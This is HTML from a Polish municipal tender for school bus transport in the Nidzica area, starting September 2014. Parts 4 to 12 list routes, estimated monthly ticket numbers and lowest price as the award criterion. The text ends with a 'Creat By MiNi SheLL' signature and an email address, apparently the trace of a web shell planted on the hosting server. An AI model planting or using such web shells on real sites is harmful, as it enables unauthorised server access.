<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dowożenie uczniów do Zespołów Szkół Nr 1 i 2 w Nidzicy na trasie Nidzica- Piątki-Borowy  Młyn-Kolonia Kanigowo- Kanigowo- Kamionka- Pawliki- Siemiątki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szacunkowa liczba biletów miesięcznych:
-	Nidzica-Piątki-Nidzica- 5 biletów
-	Nidzica-Borowy Młyn-Nidzica- 1 bilet
-	Nidzica-Kolonia Kanigowo-Nidzica- 3 bilety
-	Nidzica-Kamionka-Nidzica 7 biletów
-	Nidzica-Pawliki-Nidzica 5 biletów
-	Nidzica-Siemiątki-Nidzica 7 biletów
-	Nidzica-Kanigowo-Nidzica 30 biletów
Przewidywany 1 przywóz poranny i 2 odwozy dla poszczególnych miejscowości
1. Wskazana  trasa jest sugerowana, może ulec zmianie tylko za zgodą Zamawiającego i pod warunkiem, że zmiana ta nie będzie miała wpływu na realizację zamówienia zgodnego z postanowieniami SIWZ i umową. 
2.Bilety miesięczne  będą zakupywane co miesiąc na podstawie zamówień składanych przez każdą z placówek oświatowych prowadzonych przez gminę Nidzica osobno. W zamówieniach tych placówka będzie określała dokładną ilość biletów miesięcznych do konkretnych miejscowości.
3. Określona liczba biletów miesięcznych jest ilością szacunkową, zamawiający zastrzega sobie możliwość zakupu mniejszej ilości biletów w związku z np. mniejszą ilością dzieci uczęszczających do placówek z danych miejscowości. Nie może to stanowić podstawy do wnoszenia roszczeń przez wykonawcę co do ilości biletów faktycznie zakupionych przez zamawiającego podczas realizacji umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dowożenie uczniów do Zespołów Szkół Nr 1 i 3 w Nidzicy na trasie Nidzica - Żelazno- Bolejny- Wólka Orłowska- Orłowo- Wietrzychowo- Wietrzychówko- Łyna- Nibork- Radomin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szacunkowa liczba biletów miesięcznych:
-	Nidzica-Żelazno-Nidzica- 11 biletów
-	Nidzica-Orłowo-Nidzica 5 biletów
-	Nidzica-Wietrzychowo-Nidzica-22 bilety
-	Nidzica-Wietrzychówek-Nidzica- 1 bilet
-	Nidzica-Bolejny-Nidzica- 5 biletów
-	Nidzica-Wólka Orłowska-Nidzica- 7 biletów
-	Nidzica-Łyna-Nidzica- 10 biletów
-	Nidzica-Nibork-Nidzica- 11 biletów
-	Nidzica-Radomin-Nidzica- 3 bilety 
Przewidywany 1 przywóz poranny i 1-2 odwozy dla poszczególnych miejscowości
1. Wskazana  trasa jest sugerowana, może ulec zmianie tylko za zgodą Zamawiającego i pod warunkiem, że zmiana ta nie będzie miała wpływu na realizację zamówienia zgodnego z postanowieniami SIWZ i umową. 
2.Bilety miesięczne  będą zakupywane co miesiąc na podstawie zamówień składanych przez każdą z placówek oświatowych prowadzonych przez gminę Nidzica osobno. W zamówieniach tych placówka będzie określała dokładną ilość biletów miesięcznych do konkretnych miejscowości.
3. Określona liczba biletów miesięcznych jest ilością szacunkową, zamawiający zastrzega sobie możliwość zakupu mniejszej ilości biletów w związku z np. mniejszą ilością dzieci uczęszczających do placówek z danych miejscowości. Nie może to stanowić podstawy do wnoszenia roszczeń przez wykonawcę co do ilości biletów faktycznie zakupionych przez zamawiającego podczas realizacji umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dowożenie uczniów do Zespołów Szkół Nr 1 i 3 w Nidzicy na trasie Nidzica- Waszulki- Kolonia Piątki- Olszewo- Piątki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szacunkowa liczba biletów miesięcznych:
-	Nidzica-Waszulki-Nidzica- 17 biletów
-	Nidzica-Kolonia Piątki-Nidzica- 4 bilety
-	Nidzica-Olszewo-Nidzica- 10 biletów 
-	Nidzica-Piątki-Nidzica- 21 biletów
Przewidywany 1 przywóz poranny i 2 odwozy dla poszczególnych miejscowości
1. Wskazana  trasa jest sugerowana, może ulec zmianie tylko za zgodą Zamawiającego i pod warunkiem, że zmiana ta nie będzie miała wpływu na realizację zamówienia zgodnego z postanowieniami SIWZ i umową. 
2.Bilety miesięczne  będą zakupywane co miesiąc na podstawie zamówień składanych przez każdą z placówek oświatowych prowadzonych przez gminę Nidzica osobno. W zamówieniach tych placówka będzie określała dokładną ilość biletów miesięcznych do konkretnych miejscowości.
3. Określona liczba biletów miesięcznych jest ilością szacunkową, zamawiający zastrzega sobie możliwość zakupu mniejszej ilości biletów w związku z np. mniejszą ilością dzieci uczęszczających do placówek z danych miejscowości. Nie może to stanowić podstawy do wnoszenia roszczeń przez wykonawcę co do ilości biletów faktycznie zakupionych przez zamawiającego podczas realizacji umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dowożenie uczniów do Szkoły Podstawowej w  Rączkach, Zespołów Szkół Nr 1 i 2 w Nidzicy na trasie Nidzica - Litwinki- Załuski - Frąknowo - Mogiłowo- Rączki- Januszkowo- Michałki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szacunkowa liczba biletów miesięcznych:
-	Nidzica-Litwinki-Rączki- 1 bilet
-	Nidzica-Litwinki-Nidzica- 2 bilety
-	Nidzica- Załuski-Rączki- 29 biletów
-	Nidzica- Załuski-Nidzica- 16 biletów
-	Nidzica-Frąknowo-Rączki- 9 biletów
-	Nidzica-Frąknowo-Nidzica- 5 biletów
-	Nidzica-Mogiłowo-Rączki- 1 bilet
-	Nidzica-Mogiłowo-Nidzica- 3 bilety
-	Nidzica-Januszkowo-Rączki- 42 bilety
-	Nidzica-Januszkowo-Nidzica- 9 biletów
-	Nidzica-Michałki-Rączki- 4 bilety
-	Nidzica-Michałki-Nidzica- 4 bilety
Przewidywany 1 przywóz poranny i 3-4 odwozy dla poszczególnych miejscowości
1. Wskazana  trasa jest sugerowana, może ulec zmianie tylko za zgodą Zamawiającego i pod warunkiem, że zmiana ta nie będzie miała wpływu na realizację zamówienia zgodnego z postanowieniami SIWZ i umową. 
2.Bilety miesięczne  będą zakupywane co miesiąc na podstawie zamówień składanych przez każdą z placówek oświatowych prowadzonych przez gminę Nidzica osobno. W zamówieniach tych placówka będzie określała dokładną ilość biletów miesięcznych do konkretnych miejscowości.
3. Określona liczba biletów miesięcznych jest ilością szacunkową, zamawiający zastrzega sobie możliwość zakupu mniejszej ilości biletów w związku z np. mniejszą ilością dzieci uczęszczających do placówek z danych miejscowości. Nie może to stanowić podstawy do wnoszenia roszczeń przez wykonawcę co do ilości biletów faktycznie zakupionych przez zamawiającego podczas realizacji umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dowożenie uczniów do Szkoły Podstawowej w  Nr 1 w Nidzicy na trasie Nidzica- Bartki- Nidzica.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szacunkowa liczba biletów miesięcznych:
-	Bartki- 4 bilety
Przewidywany 1 przywóz poranny i 2 odwozy dla poszczególnych miejscowości
1. Wskazana  trasa jest sugerowana, może ulec zmianie tylko za zgodą Zamawiającego i pod warunkiem, że zmiana ta nie będzie miała wpływu na realizację zamówienia zgodnego z postanowieniami SIWZ i umową. 
2.Bilety miesięczne  będą zakupywane co miesiąc na podstawie zamówień składanych przez każdą z placówek oświatowych prowadzonych przez gminę Nidzica osobno. W zamówieniach tych placówka będzie określała dokładną ilość biletów miesięcznych do konkretnych miejscowości.
3. Określona liczba biletów miesięcznych jest ilością szacunkową, zamawiający zastrzega sobie możliwość zakupu mniejszej ilości biletów w związku z np. mniejszą ilością dzieci uczęszczających do placówek z danych miejscowości. Nie może to stanowić podstawy do wnoszenia roszczeń przez wykonawcę co do ilości biletów faktycznie zakupionych przez zamawiającego podczas realizacji umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Dowożenie uczniów do Szkoły Podstawowej w  Nr 1 w Nidzicy na trasie Nidzica- Muszaki -Nidzica.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szacunkowa liczba biletów miesięcznych:
-	Muszaki- 3 bilety
Przewidywany 1 przywóz poranny i 2 odwozy dla poszczególnych miejscowości
1. Wskazana  trasa jest sugerowana, może ulec zmianie tylko za zgodą Zamawiającego i pod warunkiem, że zmiana ta nie będzie miała wpływu na realizację zamówienia zgodnego z postanowieniami SIWZ i umową. 
2.Bilety miesięczne  będą zakupywane co miesiąc na podstawie zamówień składanych przez każdą z placówek oświatowych prowadzonych przez gminę Nidzica osobno. W zamówieniach tych placówka będzie określała dokładną ilość biletów miesięcznych do konkretnych miejscowości.
3. Określona liczba biletów miesięcznych jest ilością szacunkową, zamawiający zastrzega sobie możliwość zakupu mniejszej ilości biletów w związku z np. mniejszą ilością dzieci uczęszczających do placówek z danych miejscowości. Nie może to stanowić podstawy do wnoszenia roszczeń przez wykonawcę co do ilości biletów faktycznie zakupionych przez zamawiającego podczas realizacji umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Dowożenie uczniów do do Szkoły Podstawowej w  Nr 1 w Nidzicy na trasie Nidzica- Kozłowo- Nidzica.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szacunkowa liczba biletów miesięcznych:
- Kozłowo- 1 bilet
Przewidywany 1 przywóz poranny i 2 odwozy dla poszczególnych miejscowości
1. Wskazana  trasa jest sugerowana, może ulec zmianie tylko za zgodą Zamawiającego i pod warunkiem, że zmiana ta nie będzie miała wpływu na realizację zamówienia zgodnego z postanowieniami SIWZ i umową. 
2.Bilety miesięczne  będą zakupywane co miesiąc na podstawie zamówień składanych przez każdą z placówek oświatowych prowadzonych przez gminę Nidzica osobno. W zamówieniach tych placówka będzie określała dokładną ilość biletów miesięcznych do konkretnych miejscowości.
3. Określona liczba biletów miesięcznych jest ilością szacunkową, zamawiający zastrzega sobie możliwość zakupu mniejszej ilości biletów w związku z np. mniejszą ilością dzieci uczęszczających do placówek z danych miejscowości. Nie może to stanowić podstawy do wnoszenia roszczeń przez wykonawcę co do ilości biletów faktycznie zakupionych przez zamawiającego podczas realizacji umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Dowożenie uczniów do Zespołów Szkół w  Nr 1, 2 i 3 na trasie Nidzica- Tatary- Nidzica.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szacunkowa liczba biletów miesięcznych:
-	Tatary- 31 biletów
Przewidywany 1 przywóz poranny i 2 odwozy dla poszczególnych miejscowości
1. Wskazana  trasa jest sugerowana, może ulec zmianie tylko za zgodą Zamawiającego i pod warunkiem, że zmiana ta nie będzie miała wpływu na realizację zamówienia zgodnego z postanowieniami SIWZ i umową. 
2.Bilety miesięczne  będą zakupywane co miesiąc na podstawie zamówień składanych przez każdą z placówek oświatowych prowadzonych przez gminę Nidzica osobno. W zamówieniach tych placówka będzie określała dokładną ilość biletów miesięcznych do konkretnych miejscowości.
3. Określona liczba biletów miesięcznych jest ilością szacunkową, zamawiający zastrzega sobie możliwość zakupu mniejszej ilości biletów w związku z np. mniejszą ilością dzieci uczęszczających do placówek z danych miejscowości. Nie może to stanowić podstawy do wnoszenia roszczeń przez wykonawcę co do ilości biletów faktycznie zakupionych przez zamawiającego podczas realizacji umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Dowożenie uczniów do Szkoły Podstawowej w  Napiwodzie, Zespołów Szkół Nr 1 i 2 w Nidzicy  na trasie Nidzica- Wały- Zimna Woda - Nidzica.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szacunkowa liczba biletów miesięcznych:
-	Nidzica-Wały-Napiwoda- 5 biletów
-	Nidzica-Wały-Nidzica- 5 biletów
-	Nidzica-Zimna Woda-Napiwoda- 2 bilety
-	Nidzica-Zimna Woda-Nidzica- 5 biletów
Przewidywany 1 przywóz poranny i 2 odwozy dla poszczególnych miejscowości
1. Wskazana  trasa jest sugerowana, może ulec zmianie tylko za zgodą Zamawiającego i pod warunkiem, że zmiana ta nie będzie miała wpływu na realizację zamówienia zgodnego z postanowieniami SIWZ i umową. 
2.Bilety miesięczne  będą zakupywane co miesiąc na podstawie zamówień składanych przez każdą z placówek oświatowych prowadzonych przez gminę Nidzica osobno. W zamówieniach tych placówka będzie określała dokładną ilość biletów miesięcznych do konkretnych miejscowości.
3. Określona liczba biletów miesięcznych jest ilością szacunkową, zamawiający zastrzega sobie możliwość zakupu mniejszej ilości biletów w związku z np. mniejszą ilością dzieci uczęszczających do placówek z danych miejscowości. Nie może to stanowić podstawy do wnoszenia roszczeń przez wykonawcę co do ilości biletów faktycznie zakupionych przez zamawiającego podczas realizacji umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com